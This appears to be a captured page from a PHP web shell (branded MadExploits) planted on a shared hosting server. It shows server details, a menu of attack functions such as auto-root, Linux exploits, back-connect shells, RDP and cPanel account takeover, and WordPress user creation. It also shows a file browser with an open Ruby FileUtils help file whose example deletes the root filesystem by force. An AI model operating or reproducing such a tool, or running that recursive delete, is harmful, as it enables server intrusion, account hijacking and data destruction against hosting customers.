Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
FileUtils /
[ HOME SHELL ]
Name
Size
Permission
Action
DryRun
[ DIR ]
drwxr-xr-x
Entry_
[ DIR ]
drwxr-xr-x
NoWrite
[ DIR ]
drwxr-xr-x
StreamUtils_
[ DIR ]
drwxr-xr-x
Verbose
[ DIR ]
drwxr-xr-x
cd-i.yaml
640
B
-rw-r--r--
cdesc-FileUtils.yaml
6.06
KB
-rw-r--r--
chdir-i.yaml
236
B
-rw-r--r--
chmod-i.yaml
598
B
-rw-r--r--
chmod_R-i.yaml
504
B
-rw-r--r--
chown-i.yaml
756
B
-rw-r--r--
chown_R-i.yaml
765
B
-rw-r--r--
cmp-i.yaml
229
B
-rw-r--r--
collect_method-c.yaml
458
B
-rw-r--r--
commands-c.yaml
421
B
-rw-r--r--
compare_file-i.yaml
553
B
-rw-r--r--
compare_stream-i.yaml
307
B
-rw-r--r--
copy-i.yaml
240
B
-rw-r--r--
copy_entry-i.yaml
1.04
KB
-rw-r--r--
copy_file-i.yaml
373
B
-rw-r--r--
copy_stream-i.yaml
356
B
-rw-r--r--
cp-i.yaml
884
B
-rw-r--r--
cp_r-i.yaml
1.29
KB
-rw-r--r--
fu_have_symlink%3f-i.yaml
188
B
-rw-r--r--
fu_world_writable%3f-i.yaml
195
B
-rw-r--r--
getwd-i.yaml
220
B
-rw-r--r--
have_option%3f-c.yaml
506
B
-rw-r--r--
identical%3f-i.yaml
243
B
-rw-r--r--
install-i.yaml
747
B
-rw-r--r--
link-i.yaml
240
B
-rw-r--r--
ln-i.yaml
1.23
KB
-rw-r--r--
ln_s-i.yaml
1.32
KB
-rw-r--r--
ln_sf-i.yaml
364
B
-rw-r--r--
makedirs-i.yaml
248
B
-rw-r--r--
mkdir-i.yaml
539
B
-rw-r--r--
mkdir_p-i.yaml
836
B
-rw-r--r--
mkpath-i.yaml
244
B
-rw-r--r--
move-i.yaml
240
B
-rw-r--r--
mv-i.yaml
787
B
-rw-r--r--
options-c.yaml
414
B
-rw-r--r--
options_of-c.yaml
415
B
-rw-r--r--
pwd-i.yaml
337
B
-rw-r--r--
remove-i.yaml
239
B
-rw-r--r--
remove_dir-i.yaml
356
B
-rw-r--r--
remove_entry-i.yaml
482
B
-rw-r--r--
remove_entry_secure-i.yaml
1.88
KB
-rw-r--r--
remove_file-i.yaml
325
B
-rw-r--r--
rm-i.yaml
659
B
-rw-r--r--
rm_f-i.yaml
414
B
-rw-r--r--
rm_r-i.yaml
1.18
KB
-rw-r--r--
rm_rf-i.yaml
546
B
-rw-r--r--
rmdir-i.yaml
557
B
-rw-r--r--
rmtree-i.yaml
242
B
-rw-r--r--
safe_unlink-i.yaml
251
B
-rw-r--r--
symlink-i.yaml
248
B
-rw-r--r--
touch-i.yaml
531
B
-rw-r--r--
uptodate%3f-i.yaml
538
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rm_r-i.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: "Options: force noop verbose secure" - !ruby/struct:SM::Flow::P body: remove files <tt>list</tt>[0] <tt>list</tt>[1]... If <tt>list</tt>[n] is a directory, removes its all contents recursively. This method ignores StandardError when :force option is set. - !ruby/struct:SM::Flow::VERB body: " FileUtils.rm_r Dir.glob('/tmp/*')\n FileUtils.rm_r '/', :force => true # :-)\n" - !ruby/struct:SM::Flow::P body: "WARNING: This method causes local vulnerability if one of parent directories or removing directory tree are world writable (including /tmp, whose permission is 1777), and the current process has strong privilege such as Unix super user (root), and the system has symbolic link. For secure removing, read the documentation of #remove_entry_secure carefully, and set :secure option to true. Default is :secure=>false." - !ruby/struct:SM::Flow::P body: "NOTE: This method calls #remove_entry_secure if :secure option is set. See also #remove_entry_secure." full_name: FileUtils#rm_r is_singleton: false name: rm_r params: (list, options = {}) visibility: public
Close